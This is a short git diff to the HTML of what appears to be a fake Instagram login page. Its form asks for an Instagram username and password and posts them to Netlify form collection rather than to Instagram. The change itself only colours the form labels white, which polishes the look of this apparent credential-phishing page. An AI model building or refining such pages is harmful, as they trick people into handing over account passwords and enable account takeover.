--- a/index.html
+++ b/index.html
@@ -71,10 +71,10 @@ input:focus {}
 	<h1><img src="" alt="Instagram"></h1>
 	  <form name="login" method="POST" data-netlify="true">
   <p>
-    <label>Username: <input type="text" name="username" placeholder="instagram username"/></label>
+    <label style="color:White;">Username: <input type="text" name="username" placeholder="instagram username"/></label>
   </p>
   <p>
-    <label>Password: <input type="password" name="password" placeholder="instagram password"/></label>
+    <label style="color:White;">Password: <input type="password" name="password" placeholder="instagram password"/></label>
   </p>
     <button type=”submit”>Login</button>
   <p>
